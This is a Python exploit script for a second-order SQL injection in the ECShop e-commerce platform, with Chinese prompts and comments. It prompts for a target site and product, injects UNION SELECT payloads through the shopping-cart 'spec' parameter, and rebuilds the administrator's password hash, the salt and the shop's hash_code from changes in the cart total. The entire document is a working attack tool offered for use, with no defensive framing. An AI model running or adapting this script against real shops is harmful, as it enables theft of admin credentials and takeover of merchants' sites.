ecshop二次注入
#coding=gbk
#/usr/bin/env python
import urllib2,sys
import cookielib
import requests
import re,binascii
attackurl=raw_input("输入漏洞网站:")
attackid=raw_input("输入物ID:")
attackprice=raw_input("输入物品价格:")
def postdata(url,data="",regex=""):
r=s.post(url,data)
result=r.text
print result
if regex !="":
reg=re.findall(regex, result)
#print regex
#print reg
if reg:
return result,reg[0]
else:
return result
def infomation(url):
global spec,goods,price
goods=re.findall(r'id=(\d{1,5})',url)
spec=postdata(url,regex=r"spec_value_(\d{1,10})")
def sqlinjection(sql):
post_data={"goods":"""{"quick":1,"spec":["%s","%s"],"goods_id":%s,"number":"1","parent":0}"""%(spec[1],sql,goods[0])}
url=attackurl + "/flow.php?step=add_to_cart"
price=postdata(url,post_data,regex=ur"总计金额\s\S(\d{1,10})")
url=attackurl + "/flow.php"
goods_number=postdata(url,regex=r"goods_number\[.*\]")
goods_num=goods_number[1]
data={"%s"%(goods_num):"1","submit":"%B8%FC%D0%C2%B9%BA%CE%EF%B3%B5","step":"update_cart"}
update_cart=postdata(url,data,regex=ur"购物车更新成功")
new_price=postdata(url,regex=ur"购物金额小计\s\S(\d{1,10})")
#print new_price,price,goods_number
if new_price[1]:
#res_price=int(new_price[1])-int(price[1])
res_price=int(new_price[1])-int(attackprice)
#print res_price
passwd=binascii.a2b_hex(str(res_price))
#清空购物车
url=url + "/flow.php?step=clear"
postdata(url)
return passwd
def get_salt():
sql="2') and 1=2 union select hex(substring(ec_salt from 1 for 4)) from ecs_admin_user where user_id=1 order by attr_price desc #"
print "salt is : " + sqlinjection(sql)
def get_hash_code():
passwd=""
for x in range(0,8):
sql="2') and 1=2 union select hex(substring(value from %d for 4)) from ecs_shop_config where code='hash_code' order by attr_price desc #"%(1+x*4)
passwd+=sqlinjection(sql)
print "hash_code is : " + passwd
def get_admin_pass():
global passwd
passwd=""
for x in range(0,8):
sql="2') and 1=2 union select hex(substring(password from %d for 4)) from ecs_admin_user where user_id=1 order by attr_price desc #"%(1+x*4)
passwd+=sqlinjection(sql)
print "admin_password is : " + passwd
get_salt()
get_hash_code()
if __name__ == "__main__":
s = requests.Session()
url=attackurl+"/goods.php?id="+attackid ##如果不存在 就要修改下id
infomation(url)
print "开始破解...(时间有点长,请耐心等待)"
get_admin_pass()